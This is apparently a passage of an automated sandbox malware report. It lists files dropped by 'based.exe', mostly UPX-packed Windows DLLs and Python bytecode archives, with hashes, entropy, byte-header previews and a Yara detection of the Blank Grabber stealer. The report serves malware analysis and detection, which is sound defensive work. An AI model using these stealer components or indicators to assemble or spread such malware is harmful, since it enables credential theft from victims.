                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P.........../.......................................P............`..........................................K..P....I.......@.......................K.......................................;..8...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):87832
                                                                                                                                                                              Entropy (8bit):7.91873819228598
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:wZ6by758mldpnwpd+cjwZaO4jA5e0RBcS8iGyfowoQmXsoILZ14T7SyiPxq:O7HdSpd+co4AhRiXT8aILZ14TIxq
                                                                                                                                                                              MD5:864B22495372FA4D8B18E1C535962AE2
                                                                                                                                                                              SHA1:8CFAEE73B7690B9731303199E3ED187B1C046A85
                                                                                                                                                                              SHA-256:FC57BD20B6B128AFA5FAAAC1FD0CE783031FAAF39F71B58C9CACF87A16F3325F
                                                                                                                                                                              SHA-512:9F26FE88ACA42C80EB39153708B2315A4154204FC423CA474860072DD68CCC00B7081E8ADB87EF9A26B9F64CD2F4334F64BC2F732CD47E3F44F6CF9CC16FA187
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." ..... ...............................................................`.........................................4...L....................@.........................................................8...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26392
                                                                                                                                                                              Entropy (8bit):7.451874097949462
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:9Oa1OtK/srvmpp1ILQUe+5YiSyvz5PxWEaAc:cMV/X1ILQUe07SydPxDc
                                                                                                                                                                              MD5:BEBC7743E8AF7A812908FCB4CDD39168
                                                                                                                                                                              SHA1:00E9056E76C3F9B2A9BABA683EAA52ECFA367EDB
                                                                                                                                                                              SHA-256:CC275B2B053410C6391339149BAF5B58DF121A915D18B889F184BE02BEDAF9BC
                                                                                                                                                                              SHA-512:C56496C6396B8C3EC5EC52542061B2146EA80D986DFE13B0D4FEB7B5953C80663E34CCD7B7EE99C4344352492BE93F7D31F7830EC9EC2CA8A0C2055CB18FA8DB
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a............................................V...................V......V......V......V......Rich....................PE..d.....,d.........." .....0................................................................`.............................................L.......P............`..............<...........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):43800
                                                                                                                                                                              Entropy (8bit):7.716600949168409
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:Qp4KUJsCditRTPL/f9hpDd1ciTceZS/VgpjrpILLwjm/5YiSyv6PxWEads:QpghditRDL/1rcOcT/V4rpILLwjmx7Sd
                                                                                                                                                                              MD5:49F87AEC74FEA76792972022F6715C4D
                                                                                                                                                                              SHA1:ED1402BB0C80B36956EC9BAF750B96C7593911BD
                                                                                                                                                                              SHA-256:5D8C8186DF42633679D6236C1FEBF93DB26405C1706F9B5D767FEAB440EA38B0
                                                                                                                                                                              SHA-512:DE58D69228395827547E07695F70EF98CDAF041EBAAE0C3686246209254F0336A589B58D44B7776CCAE24A5BC03B9DC8354C768170B1771855F342EECC5FEAD4
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....p...........k....................................................`.............................................P.......h............ ..<...........X........................................w..8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc................n..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):51480
                                                                                                                                                                              Entropy (8bit):7.7600775531574655
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:44+FRSaAh0lhSoqx1HuILOQzM7SywcPxC:4CMA0ILOQzMWMxC
                                                                                                                                                                              MD5:70A7050387359A0FAB75B042256B371F
                                                                                                                                                                              SHA1:5FFC6DFBADDB6829B1BFD478EFFB4917D42DFF85
                                                                                                                                                                              SHA-256:E168A1E229F57248253EAD19F60802B25DC0DBC717C9776E157B8878D2CA4F3D
                                                                                                                                                                              SHA-512:154FD26D4CA1E6A85E3B84CE9794A9D1EF6957C3BBA280D666686A0F14AA571AAEC20BAA0E869A78D4669F1F28EA333C0E9E4D3ECD51B25D34E46A0EF74EE735
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V/\.8|\.8|\.8|U..|Z.8|..9}^.8|:..|].8|..=}P.8|..<}T.8|..;}_.8|..9}Y.8|..9}^.8|\.9|..8|..5}U.8|..8}].8|...|].8|..:}].8|Rich\.8|................PE..d...#.,d.........." .............@.......P................................................`.............................................P.......4............`..D...........(...........................................8...........................................UPX0.....@..............................UPX1.........P......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):63768
                                                                                                                                                                              Entropy (8bit):7.844124998607476
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:cww8TGrTNdinN5kuAQZMXb4zdILC74+67SykPx1:FPTGrTmN5kHQZMXc5ILC74Tax1
                                                                                                                                                                              MD5:9A7AB96204E505C760921B98E259A572
                                                                                                                                                                              SHA1:39226C222D3C439A03EAC8F72B527A7704124A87
                                                                                                                                                                              SHA-256:CAE09BBBB12AA339FD9226698E7C7F003A26A95390C7DC3A2D71A1E540508644
                                                                                                                                                                              SHA-512:0F5F58FB47379B829EE70C631B3E107CDE6A69DC64E4C993FB281F2D5ADA926405CE29EA8B1F4F87ED14610E18133932C7273A1AA209A0394CC6332F2ABA7E58
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C.-...-...-.....-...,...-...(...-...)...-.......-.W.,...-.R.,...-...,...-...,...-.W. ...-.W.-...-.W....-.W./...-.Rich..-.................PE..d.....,d.........." ......................................................................`.........................................p...d....................P..........................................................8...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):880569
                                                                                                                                                                              Entropy (8bit):5.682993312079324
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:cgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMN+:cgYJiVBFLa2VIVwx/fpEWe+MN+
                                                                                                                                                                              MD5:C4989BCEB9E7E83078812C9532BAEEA7
                                                                                                                                                                              SHA1:AAFB66EBDB5EDC327D7CB6632EB80742BE1AD2EB
                                                                                                                                                                              SHA-256:A0F5C7F0BAC1EA9DC86D60D20F903CC42CFF3F21737426D69D47909FC28B6DCD
                                                                                                                                                                              SHA-512:FB6D431D0F2C8543AF8DF242337797F981D108755712EC6C134D451AA777D377DF085B4046970CC5AC0991922DDF1F37445A51BE1A63EF46B0D80841222FB671
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:PK..........!..,..5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):54887
                                                                                                                                                                              Entropy (8bit):7.783861829315629
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:i/APzrmUbD3as0dfiKQZfjycSjN/u7uc8r:i4/mU/3LfjjSjN+O
                                                                                                                                                                              MD5:1D2E094945207E0BD578D3BE2565BDFA
                                                                                                                                                                              SHA1:0F743CE7A2E1D8468F7EF170F5A88C338EA0D008
                                                                                                                                                                              SHA-256:6B4459E374720E7D3678E8E9DE623DDEDAB374A4595635FC6543FFC55373FD5D
                                                                                                                                                                              SHA-512:133B50F43088D63B111E551EDCF9D5064AC7105C8780EFD72DB55A06E34003B40CEAD7C35097AB7D8067E5F2D069ADD7A886E079733C9D51102BD8FD483D98C9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:PK.........].X................stub-o.pyco........8.f.........................@...sl...e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.d.d...Z.d.Z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e...Z.z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e...........pie.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............d.....W.nA..e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d...............y.......Y.n.w.G.d.d...d...Z.d.S.)....b....a....s....e....6....4.....r.
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1112856
                                                                                                                                                                              Entropy (8bit):7.937513332106868
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:AfVpBeOErQiWG03fz7UuJ7G/y1Pcg8rWgrnNFF+EoIFAVMBU1CPwDv3uFfJN:4pBejNWGoXFJ7ay14rWgrnNxoIFAy+1Y
                                                                                                                                                                              MD5:BBC1FCB5792F226C82E3E958948CB3C3
                                                                                                                                                                              SHA1:4D25857BCF0651D90725D4FB8DB03CCADA6540C3
                                                                                                                                                                              SHA-256:9A36E09F111687E6B450937BB9C8AEDE7C37D598B1CCCC1293EED2342D11CF47
                                                                                                                                                                              SHA-512:3137BE91F3393DF2D56A3255281DB7D4A4DCCD6850EEB4F0DF69D4C8DDA625B85D5634FCE49B195F3CC431E2245B8E9BA401BAAA08778A467639EE4C1CC23D8D
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..........&..n5...&...................................7...........`......................................... .5.......5.h.....5.......2...............7......................................z5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc.........5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):24088
                                                                                                                                                                              Entropy (8bit):7.527291720504194
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:hRZBxuj5W4IBzuU2CUvOEvba4Za7gJXkrZRCXEpnYPLxDG4y80uzFLhHj:rwlGuUm2Evb1p07pWDG4yKRF
                                                                                                                                                                              MD5:6F818913FAFE8E4DF7FEDC46131F201F
                                                                                                                                                                              SHA1:BBB7BA3EDBD4783F7F973D97B0B568CC69CADAC5
                                                                                                                                                                              SHA-256:3F94EE4F23F6C7702AB0CC12995A6457BF22183FA828C30CC12288ADF153AE56
                                                                                                                                                                              SHA-512:5473FE57DC40AF44EDB4F8A7EFD68C512784649D51B2045D570C7E49399990285B59CFA6BCD25EF1316E0A073EA2A89FE46BE3BFC33F05E3333037A1FD3A6639
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....@................................................................`.........................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):209688
                                                                                                                                                                              Entropy (8bit):7.925861479415686
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:He9fHP8SzrOGFIXkUNNlvBK8Tg111WMEGf0+fGYahm8YNIqepRLvwdlMrQk/OlfJ:+99u/XRxpK8M111nEE0iGYziqGdvwLeO
                                                                                                                                                                              MD5:AD0A2B4286A43A0EF05F452667E656DB
                                                                                                                                                                              SHA1:A8835CA75768B5756AA2445CA33B16E18CEACB77
                                                                                                                                                                              SHA-256:2AF3D965863018C66C2A9A2D66072FE3657BBD0B900473B9BBDCAC8091686AE1
                                                                                                                                                                              SHA-512:CCEB5EC1DD6D2801ABBACD6112393FECBF5D88FE52DB86CFC98F13326C3D3E31C042B0CC180B640D0F33681BDD9E6A355DC0FBFDE597A323C8D9E88DE40B37C4
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1}q.1}q.1}q.8..=}q.~.p.3}q.z.p.3}q.~.t.=}q.~.u.9}q.~.r.5}q...p.2}q.1}p..|q...u..}q...q.0}q.....0}q...s.0}q.Rich1}q.........PE..d......c.........." ...".....P...`.......p................................................`..........................................6..4@...3.......0...........N...........v.......................................&..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1514776
                                                                                                                                                                              Entropy (8bit):7.99244120733247
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:24576:AqrG9EWpLjdwiANNmpsWKCixQvvkZVqezQv4ivFf1BiuY1Gb+Dyl3/lJYjhYPkm9:A9xdvANw3J72q016ie6Ds/lJYjhq/
                                                                                                                                                                              MD5:4A6AFA2200B1918C413D511C5A3C041C
                                                                                                                                                                              SHA1:39CA3C2B669ADAC07D4A5EB1B3B79256CFE0C3B3
                                                                                                                                                                              SHA-256:BEC187F608507B57CF0475971BA646B8AB42288AF8FDCF78BCE25F1D8C84B1DA
                                                                                                                                                                              SHA-512:DBFFB06FFFF0542200344EA9863A44A6F1E1B783379E53DF18580E697E8204D3911E091DEB32A9C94B5599CDD54301B705B74E1F51104151CF13B89D57280A20
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." ..... .......P/..jE..`/..................................`F...........`...........................................E.......E.d.....E......`B..............PF......................................vE.8...........................................UPX0.....P/.............................UPX1..... ...`/.....................@....rsrc.........E.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):630736
                                                                                                                                                                              Entropy (8bit):6.409476333013752
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                              MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                              SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                              SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                              SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):456
                                                                                                                                                                              Entropy (8bit):4.447296373872587
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                              MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                              SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                              SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                              SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI77042\rarreg.key, Author: Joe Security
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26392
                                                                                                                                                                              Entropy (8bit):7.406438297877472
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:7iRf5SV1a/KjrtZa7gJXEOBILQGe6vHQIYiSy1pCQ6wYPxh8E9VF0NyvrO:7GxSVQiVpUOBILQGek5YiSyvrYPxWEl6
                                                                                                                                                                              MD5:B6DE7C98E66BDE6ECFFBF0A1397A6B90
                                                                                                                                                                              SHA1:63823EF106E8FD9EA69AF01D8FE474230596C882
                                                                                                                                                                              SHA-256:84B2119ED6C33DFBDF29785292A529AABBF75139D163CFBCC99805623BB3863C
                                                                                                                                                                              SHA-512:1FC26E8EDC447D87A4213CB5DF5D18F990BBA80E5635E83193F2AE5368DD88A81FDDFB4575EF4475E9BF2A6D75C5C66C8ED772496FFA761C0D8644FCF40517CA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .....0...............................................................`......................................... ...L....................`..............l..........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):637208
                                                                                                                                                                              Entropy (8bit):7.9938769843425055
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:12288:cgQcg1GTl88t0wK2F/vqa544fHQ8+f9qwSKjxC785HhqNFAKNiyxWS/:cgduil88t7Ksa0DfHQzUKjxC7EhqNFA+
                                                                                                                                                                              MD5:0C4996047B6EFDA770B03F8F231E39B8
                                                                                                                                                                              SHA1:DFFCABCD4E950CC8EE94C313F1A59E3021A0AD48
                                                                                                                                                                              SHA-256:983F31BC687E0537D6028A9A65F4825CC560BBF3CB3EB0D3C0FCC2238219B5ED
                                                                                                                                                                              SHA-512:112773B83B5B4B71007F2668B0344BF45DB03BBE1F97AE738615F3C4E2F8AFB54B3AE095EA1131BF858DDFB1E585389658AF5DB56561609A154AE6BB80DC79BA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.v....@...@...@...@...@I..A...@I..A...@I..A...@I..A...@P..A...@...@...@..A...@..A...@..@...@..A...@Rich...@........PE..d.....,d.........." .....`...0.......Z....................................................`..........................................{..."...x.......p.......0..L....................................................f..8...........................................UPX0....................................UPX1.....`.......X..................@....rsrc....0...p.......\..............@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):296728
                                                                                                                                                                              Entropy (8bit):7.985011478309557
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:UcNGPr86AeT4HbUO2GkYmuUuQG1a7kj04fuNPYn/VoR4:UcNGz86iHbUORk+D1a7kLWNwna4
                                                                                                                                                                              MD5:C697DC94BDF07A57D84C7C3AA96A2991
                                                                                                                                                                              SHA1:641106ACD3F51E6DB1D51AA2E4D4E79CF71DC1AB
                                                                                                                                                                              SHA-256:58605600FDAAFBC0052A4C1EB92F68005307554CF5AD04C226C320A1C14F789E
                                                                                                                                                                              SHA-512:4F735678B7E38C8E8B693593696F9483CF21F00AEA2A6027E908515AA047EC873578C5068354973786E9CFD0D25B7AB1DD6CBB1B97654F202CBB17E233247A61
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)|.K(.eJ)..K(.eJ).eK).eJ)|.G(.eJ)|.J(.eJ)|..).eJ)|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....P...........V... ................................................`..........................................{..X....y.......p..........H............{.......................................b..8...........................................UPX0....................................UPX1.....P... ...F..................@....rsrc........p.......J..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
